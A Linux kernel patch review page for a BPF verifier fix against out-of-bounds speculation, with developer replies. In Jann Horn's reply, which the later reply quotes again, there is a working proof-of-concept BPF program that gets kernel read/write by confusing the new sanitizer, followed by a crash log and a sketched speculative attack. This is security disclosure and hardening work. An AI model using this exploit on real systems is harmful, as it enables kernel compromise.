[bpf,v3,8/9] bpf: prevent out of bounds speculation on pointer arithmetic
diff mbox series

Message ID 20190102235835.3311-9-daniel@iogearbox.net
State Accepted
Delegated to: BPF Maintainers
Headers show
Series
  • bpf fix to prevent oob under speculation
Related show

Commit Message

Daniel Borkmann Jan. 2, 2019, 11:58 p.m. UTC
Jann reported that the original commit back in b2157399cc98
("bpf: prevent out-of-bounds speculation") was not sufficient
to stop CPU from speculating out of bounds memory access:
While b2157399cc98 only focussed on masking array map access
for unprivileged users for tail calls and data access such
that the user provided index gets sanitized from BPF program
and syscall side, there is still a more generic form affected
from BPF programs that applies to most maps that hold user
data in relation to dynamic map access when dealing with
unknown scalars or "slow" known scalars as access offset, for
example:

  - Load a map value pointer into R6
  - Load an index into R7
  - Do a slow computation (e.g. with a memory dependency) that
    loads a limit into R8 (e.g. load the limit from a map for
    high latency, then mask it to make the verifier happy)
  - Exit if R7 >= R8 (mispredicted branch)
  - Load R0 = R6[R7]
  - Load R0 = R6[R0]

For unknown scalars there are two options in the BPF verifier
where we could derive knowledge from in order to guarantee
safe access to the memory: i) While </>/<=/>= variants won't
allow to derive any lower or upper bounds from the unknown
scalar where it would be safe to add it to the map value
pointer, it is possible through ==/!= test however. ii) another
option is to transform the unknown scalar into a known scalar,
for example, through ALU ops combination such as R &= <imm>
followed by R |= <imm> or any similar combination where the
original information from the unknown scalar would be destroyed
entirely leaving R with a constant. The initial slow load still
precedes the latter ALU ops on that register, so the CPU
executes speculatively from that point. Once we have the known
scalar, any compare operation would work then. A third option
only involving registers with known scalars could be crafted
as described in [0] where a CPU port (e.g. Slow Int unit)
would be filled with many dependent computations such that
the subsequent condition depending on its outcome has to wait
for evaluation on its execution port and thereby executing
speculatively if the speculated code can be scheduled on a
different execution port, or any other form of mistraining
as described in [1], for example. Given this is not limited
to only unknown scalars, not only map but also stack access
is affected since both is accessible for unprivileged users
and could potentially be used for out of bounds access under
speculation.

In order to prevent any of these cases, the verifier is now
sanitizing pointer arithmetic on the offset such that any
out of bounds speculation would be masked in a way where the
pointer arithmetic result in the destination register will
stay unchanged, meaning offset masked into zero similar as
in array_index_nospec() case. With regards to implementation,
there are three options that were considered: i) new insn
for sanitation, ii) push/pop insn and sanitation as inlined
BPF, iii) reuse of ax register and sanitation as inlined BPF.

Option i) has the downside that we end up using from reserved
bits in the opcode space, but also that we would require
each JIT to emit masking as native arch opcodes meaning
mitigation would have slow adoption till everyone implements
it eventually which is counter-productive. Option ii) and iii)
have both in common that a temporary register is needed in
order to implement the sanitation as inlined BPF since we
are not allowed to modify the source register. While a push /
pop insn in ii) would be useful to have in any case, it
requires once again that every JIT needs to implement it
first. While possible, amount of changes needed would also
be unsuitable for a -stable patch. Therefore, the path which
has fewer changes, less BPF instructions for the mitigation
and does not require anything to be changed in the JITs is
option iii) which this work is pursuing. The ax register is
already mapped to a register in all JITs (modulo arm32 where
it's mapped to stack as various other BPF registers there)
and used in constant blinding for JITs-only so far. It can
be reused for verifier rewrites under certain constraints.
The interpreter's tmp "register" has therefore been remapped
into extending the register set with hidden ax register and
reusing that for a number of instructions that needed the
prior temporary variable internally (e.g. div, mod). This
allows for zero increase in stack space usage in the interpreter,
and enables (restricted) generic use in rewrites otherwise as
long as such a patchlet does not make use of these instructions.
The sanitation mask is dynamic and relative to the offset the
map value or stack pointer currently holds.

There are various cases that need to be taken under consideration
for the masking, e.g. such operation could look as follows:
ptr += val or val += ptr or ptr -= val. Thus, the value to be
sanitized could reside either in source or in destination
register, and the limit is different depending on whether
the ALU op is addition or subtraction and depending on the
current known and bounded offset. The limit is derived as
follows: limit := max_value_size - (smin_value + off). For
subtraction: limit := umax_value + off. This holds because
we do not allow any pointer arithmetic that would
temporarily go out of bounds or would have an unknown
value with mixed signed bounds where it is unclear at
verification time whether the actual runtime value would
be either negative or positive. For example, we have a
derived map pointer value with constant offset and bounded
one, so limit based on smin_value works because the verifier
requires that statically analyzed arithmetic on the pointer
must be in bounds, and thus it checks if resulting
smin_value + off and umax_value + off is still within map
value bounds at time of arithmetic in addition to time of
access. Similarly, for the case of stack access we derive
the limit as follows: MAX_BPF_STACK + off for subtraction
and -off for the case of addition where off := ptr_reg->off +
ptr_reg->var_off.value. Subtraction is a special case for
the masking which can be in form of ptr += -val, ptr -= -val,
or ptr -= val. In the first two cases where we know that
the value is negative, we need to temporarily negate the
value in order to do the sanitation on a positive value
where we later swap the ALU op, and restore original source
register if the value was in source.

The sanitation of pointer arithmetic alone is still not fully
sufficient as is, since a scenario like the following could
happen ...

  PTR += 0x1000 (e.g. K-based imm)
  PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
  PTR += 0x1000
  PTR -= BIG_NUMBER_WITH_SLOW_COMPARISON
  [...]

... which under speculation could end up as ...

  PTR += 0x1000
  PTR -= 0 [ truncated by mitigation ]
  PTR += 0x1000
  PTR -= 0 [ truncated by mitigation ]
  [...]

... and therefore still access out of bounds. To prevent such
case, the verifier is also analyzing safety for potential out
of bounds access under speculative execution. Meaning, it is
also simulating pointer access under truncation. We therefore
"branch off" and push the current verification state after the
ALU operation with known 0 to the verification stack for later
analysis. Given the current path analysis succeeded it is
likely that the one under speculation can be pruned. In any
case, it is also subject to existing complexity limits and
therefore anything beyond this point will be rejected. In
terms of pruning, it needs to be ensured that the verification
state from speculative execution simulation must never prune
a non-speculative execution path, therefore, we mark verifier
state accordingly at the time of push_stack(). If verifier
detects out of bounds access under speculative execution from
one of the possible paths that includes a truncation, it will
reject such program.

Given we mask every reg-based pointer arithmetic for
unprivileged programs, we've been looking into how it could
affect real-world programs in terms of size increase. As the
majority of programs are targeted for privileged-only use
case, we've unconditionally enabled masking (with its alu
restrictions on top of it) for privileged programs for the
sake of testing in order to check i) whether they get rejected
in its current form, and ii) by how much the number of
instructions and size will increase. We've tested this by
using Katran, Cilium and test_l4lb from the kernel selftests.
For Katran we've evaluated balancer_kern.o, Cilium bpf_lxc.o
and an older test object bpf_lxc_opt_-DUNKNOWN.o and l4lb
we've used test_l4lb.o as well as test_l4lb_noinline.o. We
found that none of the programs got rejected by the verifier
with this change, and that impact is rather minimal to none.
balancer_kern.o had 13,904 bytes (1,738 insns) xlated and
7,797 bytes JITed before and after the change. Most complex
program in bpf_lxc.o had 30,544 bytes (3,817 insns) xlated
and 18,538 bytes JITed before and after and none of the other
tail call programs in bpf_lxc.o had any changes either. For
the older bpf_lxc_opt_-DUNKNOWN.o object we found a small
increase from 20,616 bytes (2,576 insns) and 12,536 bytes JITed
before to 20,664 bytes (2,582 insns) and 12,558 bytes JITed
after the change. Other programs from that object file had
similar small increase. Both test_l4lb.o had no change and
remained at 6,544 bytes (817 insns) xlated and 3,401 bytes
JITed and for test_l4lb_noinline.o constant at 5,080 bytes
(634 insns) xlated and 3,313 bytes JITed. This can be explained
in that LLVM typically optimizes stack based pointer arithmetic
by using K-based operations and that use of dynamic map access
is not overly frequent. However, in future we may decide to
optimize the algorithm further under known guarantees from
branch and value speculation. Latter seems also unclear in
terms of prediction heuristics that today's CPUs apply as well
as whether there could be collisions in e.g. the predictor's
Value History/Pattern Table for triggering out of bounds access,
thus masking is performed unconditionally at this point but could
be subject to relaxation later on. We were generally also
brainstorming various other approaches for mitigation, but the
blocker was always lack of available registers at runtime and/or
overhead for runtime tracking of limits belonging to a specific
pointer. Thus, we found this to be minimally intrusive under
given constraints.

With that in place, a simple example with sanitized access on
unprivileged load at post-verification time looks as follows:

  # bpftool prog dump xlated id 282
  [...]
  28: (79) r1 = *(u64 *)(r7 +0)
  29: (79) r2 = *(u64 *)(r7 +8)
  30: (57) r1 &= 15
  31: (79) r3 = *(u64 *)(r0 +4608)
  32: (57) r3 &= 1
  33: (47) r3 |= 1
  34: (2d) if r2 > r3 goto pc+19
  35: (b4) (u32) r11 = (u32) 20479  |
  36: (1f) r11 -= r2                | Dynamic sanitation for pointer
  37: (4f) r11 |= r2                | arithmetic with registers
  38: (87) r11 = -r11               | containing bounded or known
  39: (c7) r11 s>>= 63              | scalars in order to prevent
  40: (5f) r11 &= r2                | out of bounds speculation.
  41: (0f) r4 += r11                |
  42: (71) r4 = *(u8 *)(r4 +0)
  43: (6f) r4 <<= r1
  [...]

For the case where the scalar sits in the destination register
as opposed to the source register, the following code is emitted
for the above example:

  [...]
  16: (b4) (u32) r11 = (u32) 20479
  17: (1f) r11 -= r2
  18: (4f) r11 |= r2
  19: (87) r11 = -r11
  20: (c7) r11 s>>= 63
  21: (5f) r2 &= r11
  22: (0f) r2 += r0
  23: (61) r0 = *(u32 *)(r2 +0)
  [...]

JIT blinding example with non-conflicting use of r10:

  [...]
   d5:	je     0x0000000000000106    _
   d7:	mov    0x0(%rax),%edi       |
   da:	mov    $0xf153246,%r10d     | Index load from map value and
   e0:	xor    $0xf153259,%r10      | (const blinded) mask with 0x1f.
   e7:	and    %r10,%rdi            |_
   ea:	mov    $0x2f,%r10d          |
   f0:	sub    %rdi,%r10            | Sanitized addition. Both use r10
   f3:	or     %rdi,%r10            | but do not interfere with each
   f6:	neg    %r10                 | other. (Neither do these instructions
   f9:	sar    $0x3f,%r10           | interfere with the use of ax as temp
   fd:	and    %r10,%rdi            | in interpreter.)
  100:	add    %rax,%rdi            |_
  103:	mov    0x0(%rdi),%eax
 [...]

Tested that it fixes Jann's reproducer, and also checked that test_verifier
and test_progs suite with interpreter, JIT and JIT with hardening enabled
on x86-64 and arm64 runs successfully.

  [0] Speculose: Analyzing the Security Implications of Speculative
      Execution in CPUs, Giorgi Maisuradze and Christian Rossow,
      https://arxiv.org/pdf/1801.04084.pdf

  [1] A Systematic Evaluation of Transient Execution Attacks and
      Defenses, Claudio Canella, Jo Van Bulck, Michael Schwarz,
      Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens,
      Dmitry Evtyushkin, Daniel Gruss,
      https://arxiv.org/pdf/1811.05441.pdf

Fixes: b2157399cc98 ("bpf: prevent out-of-bounds speculation")
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Alexei Starovoitov <ast@kernel.org>
---
 include/linux/bpf_verifier.h |  10 +++
 kernel/bpf/verifier.c        | 185 +++++++++++++++++++++++++++++++++++++++++--
 2 files changed, 189 insertions(+), 6 deletions(-)

Comments

Jann Horn Jan. 3, 2019, 9:13 p.m. UTC | #1
Hi!

Sorry about the extremely slow reply, I was on vacation over the
holidays and only got back today.

On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
> Jann reported that the original commit back in b2157399cc98
> ("bpf: prevent out-of-bounds speculation") was not sufficient
> to stop CPU from speculating out of bounds memory access:
> While b2157399cc98 only focussed on masking array map access
> for unprivileged users for tail calls and data access such
> that the user provided index gets sanitized from BPF program
> and syscall side, there is still a more generic form affected
> from BPF programs that applies to most maps that hold user
> data in relation to dynamic map access when dealing with
> unknown scalars or "slow" known scalars as access offset, for
> example:
[...]
> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
> +                           struct bpf_insn *insn,
> +                           const struct bpf_reg_state *ptr_reg,
> +                           struct bpf_reg_state *dst_reg,
> +                           bool off_is_neg)
> +{
[...]
> +
> +       /* If we arrived here from different branches with different
> +        * limits to sanitize, then this won't work.
> +        */
> +       if (aux->alu_state &&
> +           (aux->alu_state != alu_state ||
> +            aux->alu_limit != alu_limit))
> +               return -EACCES;

This code path doesn't get triggered in the case where the same
ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
+= reg". This leads to kernel read/write because the code intended to
ensure safety of the "ptr += reg" case in speculative execution ends
up clobbering the addend in the "numeric_reg += reg" case:

source code:
=============
int main(void) {
  int my_map = array_create(8, 30);
  array_set(my_map, 0, 1);
  struct bpf_insn insns[] = {
    // load map value pointer into r0 and r2
    BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // load some number from the map into r1
    BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),

    // branch A
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
    BPF_MOV64_IMM(BPF_REG_3, 0),
    BPF_JMP_A(2),

    // branch B
    BPF_MOV64_IMM(BPF_REG_2, 0),
    BPF_MOV64_IMM(BPF_REG_3, 0x100000),

    // *** COMMON INSTRUCTION ***
    BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),

    // depending on R1, branch:
    BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),

    // branch A
    BPF_JMP_A(4),

    // branch B
    BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
    // verifier-confused branch: verifier follows fall-through,
runtime follows jump
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // fake-dead code; targeted from branch A to prevent dead code sanitization
    BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN()
  };
  int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
  trigger_proc(sock_fd);
}
=============

verifier output:
=============
0: (18) r1 = 0x0
2: (bf) r2 = r10
3: (07) r2 += -16
4: (7a) *(u64 *)(r10 -16) = 0
5: (85) call bpf_map_lookup_elem#1
6: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
7: (95) exit

from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
fp-16=mmmmmmmm
8: (71) r1 = *(u8 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
9: (55) if r1 != 0x0 goto pc+3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
10: (bf) r2 = r0
11: (b7) r3 = 0
12: (05) goto pc+2
15: (0f) r2 += r3
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
16: (55) if r1 != 0x0 goto pc+1
17: (05) goto pc+4
22: (71) r0 = *(u8 *)(r0 +0)
 R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
fp-16=mmmmmmmm
23: (b7) r0 = 0
24: (95) exit

from 15 to 16 (speculative execution): safe

from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
fp-16=mmmmmmmm
13: (b7) r2 = 0
14: (b7) r3 = 1048576
15: (0f) r2 += r3
16: (55) if r1 != 0x0 goto pc+1
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
17: (05) goto pc+4
22: safe

from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
18: (b7) r0 = 322376503
19: (55) if r2 != 0x100000 goto pc+2
20: (b7) r0 = 0
21: (95) exit
processed 29 insns (limit 131072), stack depth 16
=============

dmesg:
=============
[ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
from=test pid=2185
[ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
83 ed 28 48
[ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
89 7d 18 31
[ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
88 ff ff 48
[ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
00 00 48 81
[ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
73 0c 83 e0
[ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
48 83 f8 00
[ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
75 10 4c 8b
[ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
00 48 83 ff
[ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
ba 00 00 10
[ 9948.459435] JIT code: 00000090: 00 41 ba 07 00 00 00 49 29 d2 49 09
d2 49 f7 da
[ 9948.466041] JIT code: 000000a0: 49 c1 fa 3f 49 21 d2 4c 01 d6 48 83
ff 00 75 02
[ 9948.470384] JIT code: 000000b0: eb 12 b8 37 13 37 13 48 81 fe 00 00
10 00 75 04
[ 9948.474085] JIT code: 000000c0: 31 c0 eb 9e 48 0f b6 40 00 31 c0 eb 95
[ 9948.478102] BUG: unable to handle kernel paging request at 0000000013371337
[ 9948.481562] #PF error: [normal kernel read fault]
[ 9948.483878] PGD 0 P4D 0
[ 9948.485139] Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC KASAN
[ 9948.487945] CPU: 5 PID: 2185 Comm: test Not tainted 4.20.0+ #225
[ 9948.490864] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS 1.10.2-1 04/01/2014
[ 9948.494912] RIP: 0010:0xffffffffc01602f3
[ 9948.497212] Code: 49 09 d2 49 f7 da 49 c1 fa 3f 49 21 d2 4c 01 d6
48 83 ff 00 75 02 eb 12 b8 37 13 37 13 48 81 fe 00 00 10 00 75 04 31
c0 eb 9e <48> 0f b6 40 00 31 c0 eb 95 cc cc cc cc cc cc cc cc cc cc cc
cc cc
[ 9948.506340] RSP: 0018:ffff8881e473f968 EFLAGS: 00010287
[ 9948.508857] RAX: 0000000013371337 RBX: ffff8881e8f01e40 RCX: ffffffff9388f848
[ 9948.512263] RDX: 0000000000100000 RSI: 0000000000000000 RDI: 0000000000000001
[ 9948.515653] RBP: ffff8881e473f978 R08: ffffed103b747002 R09: ffffed103b747002
[ 9948.519056] R10: 0000000000000000 R11: ffffed103b747001 R12: 0000000000000000
[ 9948.522452] R13: 0000000000000001 R14: ffff8881e2718600 R15: ffffc90001572000
[ 9948.525840] FS:  00007f2ad28ad700(0000) GS:ffff8881eb140000(0000)
knlGS:0000000000000000
[ 9948.529708] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 9948.532450] CR2: 0000000013371337 CR3: 00000001e76c5004 CR4: 00000000003606e0
[ 9948.535834] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 9948.539217] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 9948.542581] Call Trace:
[ 9948.543760]  ? sk_filter_trim_cap+0x148/0x2d0
[ 9948.545847]  ? sk_reuseport_is_valid_access+0xa0/0xa0
[ 9948.548249]  ? skb_copy_datagram_from_iter+0x6e/0x280
[ 9948.550655]  ? _raw_spin_unlock+0x16/0x30
[ 9948.552581]  ? deactivate_slab.isra.68+0x59d/0x600
[ 9948.554866]  ? unix_scm_to_skb+0xd1/0x230
[ 9948.556780]  ? unix_dgram_sendmsg+0x312/0x940
[ 9948.558856]  ? unix_stream_connect+0x980/0x980
[ 9948.560986]  ? aa_sk_perm+0x10c/0x3f0
[ 9948.563123]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.565107]  ? aa_af_perm+0x1e0/0x1e0
[ 9948.566608]  ? kasan_unpoison_shadow+0x35/0x40
[ 9948.568463]  ? unix_stream_connect+0x980/0x980
[ 9948.570397]  ? sock_sendmsg+0x6d/0x80
[ 9948.571948]  ? sock_write_iter+0x121/0x1c0
[ 9948.573678]  ? sock_sendmsg+0x80/0x80
[ 9948.575258]  ? sock_enable_timestamp+0x60/0x60
[ 9948.576958]  ? iov_iter_init+0x86/0xc0
[ 9948.578395]  ? __vfs_write+0x294/0x3b0
[ 9948.579782]  ? kernel_read+0xa0/0xa0
[ 9948.581152]  ? apparmor_task_setrlimit+0x330/0x330
[ 9948.582919]  ? vfs_write+0xe7/0x230
[ 9948.584228]  ? ksys_write+0xa1/0x120
[ 9948.585559]  ? __ia32_sys_read+0x50/0x50
[ 9948.587174]  ? do_syscall_64+0x73/0x160
[ 9948.588872]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 9948.591134] Modules linked in: btrfs xor zstd_compress raid6_pq
[ 9948.593654] CR2: 0000000013371337
[ 9948.595078] ---[ end trace cea5ab7027131bf2 ]---
=============



Aside from that, I also think that the pruning of "dead code" probably
still permits v1 speculative execution attacks when code vaguely like
the following is encountered, if it is possible to convince the CPU to
mispredict the second branch, but I haven't tested that so far:

R0 = <slow map value, known to be 0>;
R1 = <fast map value>;
if (R1 != R0) { // mispredicted
  return 0;
}
R3 = <a map value pointer>;
R2 = <arbitrary 64-bit number>;
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];

To convince the CPU to predict the second branch the way you want, you
could probably add another code path that jumps in front of the branch
with both R2 and R3 already containing valid pointers. Something like
this:

if (<some map value>) {
  R0 = <slow map value, known to be 0>;
  R1 = <fast map value>;
  if (R1 != R0) { // mispredicted
    return 0;
  }
  R3 = <a map value pointer>;
  R2 = <arbitrary 64-bit number>;} else {  R3 = <a map value pointer>;
 R2 = <arbitrary 64-bit number>;  R1 = 1;}
if (R1 == 0) { // architecturally always taken, verifier prunes other branch
  R2 = <a map value pointer>;
}
access R3[R2[0] & 1];
Daniel Borkmann Jan. 3, 2019, 11:22 p.m. UTC | #2
Hi Jann,

On 01/03/2019 10:13 PM, Jann Horn wrote:
> Hi!
> 
> Sorry about the extremely slow reply, I was on vacation over the
> holidays and only got back today.
> 
> On Thu, Jan 3, 2019 at 12:58 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
>> Jann reported that the original commit back in b2157399cc98
>> ("bpf: prevent out-of-bounds speculation") was not sufficient
>> to stop CPU from speculating out of bounds memory access:
>> While b2157399cc98 only focussed on masking array map access
>> for unprivileged users for tail calls and data access such
>> that the user provided index gets sanitized from BPF program
>> and syscall side, there is still a more generic form affected
>> from BPF programs that applies to most maps that hold user
>> data in relation to dynamic map access when dealing with
>> unknown scalars or "slow" known scalars as access offset, for
>> example:
> [...]
>> +static int sanitize_ptr_alu(struct bpf_verifier_env *env,
>> +                           struct bpf_insn *insn,
>> +                           const struct bpf_reg_state *ptr_reg,
>> +                           struct bpf_reg_state *dst_reg,
>> +                           bool off_is_neg)
>> +{
> [...]
>> +
>> +       /* If we arrived here from different branches with different
>> +        * limits to sanitize, then this won't work.
>> +        */
>> +       if (aux->alu_state &&
>> +           (aux->alu_state != alu_state ||
>> +            aux->alu_limit != alu_limit))
>> +               return -EACCES;
> 
> This code path doesn't get triggered in the case where the same
> ALU_ADD64 instruction is used for both "ptr += reg" and "numeric_reg
> += reg". This leads to kernel read/write because the code intended to
> ensure safety of the "ptr += reg" case in speculative execution ends
> up clobbering the addend in the "numeric_reg += reg" case:
> 
> source code:
> =============
> int main(void) {
>   int my_map = array_create(8, 30);
>   array_set(my_map, 0, 1);
>   struct bpf_insn insns[] = {
>     // load map value pointer into r0 and r2
>     BPF_LD_MAP_FD(BPF_REG_ARG1, my_map),
>     BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
>     BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -16),
>     BPF_ST_MEM(BPF_DW, BPF_REG_FP, -16, 0),
>     BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
>     BPF_EXIT_INSN(),
> 
>     // load some number from the map into r1
>     BPF_LDX_MEM(BPF_B, BPF_REG_1, BPF_REG_0, 0),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 3),
> 
>     // branch A
>     BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),
>     BPF_MOV64_IMM(BPF_REG_3, 0),
>     BPF_JMP_A(2),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_2, 0),
>     BPF_MOV64_IMM(BPF_REG_3, 0x100000),
> 
>     // *** COMMON INSTRUCTION ***
>     BPF_ALU64_REG(BPF_ADD, BPF_REG_2, BPF_REG_3),
> 
>     // depending on R1, branch:
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 1),
> 
>     // branch A
>     BPF_JMP_A(4),
> 
>     // branch B
>     BPF_MOV64_IMM(BPF_REG_0, 0x13371337),
>     // verifier-confused branch: verifier follows fall-through,
> runtime follows jump
>     BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0x100000, 2),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN(),
> 
>     // fake-dead code; targeted from branch A to prevent dead code sanitization
>     BPF_LDX_MEM(BPF_B, BPF_REG_0, BPF_REG_0, 0),
>     BPF_MOV64_IMM(BPF_REG_0, 0),
>     BPF_EXIT_INSN()
>   };
>   int sock_fd = create_filtered_socket_fd(insns, ARRSIZE(insns));
>   trigger_proc(sock_fd);
> }
> =============
> 
> verifier output:
> =============
> 0: (18) r1 = 0x0
> 2: (bf) r2 = r10
> 3: (07) r2 += -16
> 4: (7a) *(u64 *)(r10 -16) = 0
> 5: (85) call bpf_map_lookup_elem#1
> 6: (55) if r0 != 0x0 goto pc+1
>  R0=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 7: (95) exit
> 
> from 6 to 8: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 8: (71) r1 = *(u8 *)(r0 +0)
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R10=fp0,call_-1 fp-16=mmmmmmmm
> 9: (55) if r1 != 0x0 goto pc+3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R10=fp0,call_-1 fp-16=mmmmmmmm
> 10: (bf) r2 = r0
> 11: (b7) r3 = 0
> 12: (05) goto pc+2
> 15: (0f) r2 += r3
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3_w=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 16: (55) if r1 != 0x0 goto pc+1
> 17: (05) goto pc+4
> 22: (71) r0 = *(u8 *)(r0 +0)
>  R0_w=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0
> R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R3=inv0 R10=fp0,call_-1
> fp-16=mmmmmmmm
> 23: (b7) r0 = 0
> 24: (95) exit
> 
> from 15 to 16 (speculative execution): safe
> 
> from 9 to 13: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R10=fp0,call_-1
> fp-16=mmmmmmmm
> 13: (b7) r2 = 0
> 14: (b7) r3 = 1048576
> 15: (0f) r2 += r3
> 16: (55) if r1 != 0x0 goto pc+1
>  R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R1=inv0 R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 17: (05) goto pc+4
> 22: safe
> 
> from 16 to 18: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0)
> R1=inv(id=0,umax_value=255,var_off=(0x0; 0xff)) R2=inv1048576
> R3=inv1048576 R10=fp0,call_-1 fp-16=mmmmmmmm
> 18: (b7) r0 = 322376503
> 19: (55) if r2 != 0x100000 goto pc+2
> 20: (b7) r0 = 0
> 21: (95) exit
> processed 29 insns (limit 131072), stack depth 16
> =============
> 
> dmesg:
> =============
> [ 9948.417809] flen=38 proglen=205 pass=5 image=0000000039846164
> from=test pid=2185
> [ 9948.421291] JIT code: 00000000: 55 48 89 e5 48 81 ec 38 00 00 00 48
> 83 ed 28 48
> [ 9948.424560] JIT code: 00000010: 89 5d 00 4c 89 6d 08 4c 89 75 10 4c
> 89 7d 18 31
> [ 9948.428734] JIT code: 00000020: c0 48 89 45 20 48 bf 88 43 c3 da 81
> 88 ff ff 48
> [ 9948.433479] JIT code: 00000030: 89 ee 48 83 c6 f0 48 c7 45 f0 00 00
> 00 00 48 81
> [ 9948.437504] JIT code: 00000040: c7 d0 00 00 00 8b 46 00 48 83 f8 1e
> 73 0c 83 e0
> [ 9948.443528] JIT code: 00000050: 1f 48 c1 e0 03 48 01 f8 eb 02 31 c0
> 48 83 f8 00
> [ 9948.447364] JIT code: 00000060: 75 16 48 8b 5d 00 4c 8b 6d 08 4c 8b
> 75 10 4c 8b
> [ 9948.451079] JIT code: 00000070: 7d 18 48 83 c5 28 c9 c3 48 0f b6 78
> 00 48 83 ff
> [ 9948.454900] JIT code: 00000080: 00 75 07 48 89 c6 31 d2 eb 07 31 f6
> ba 00 00 10
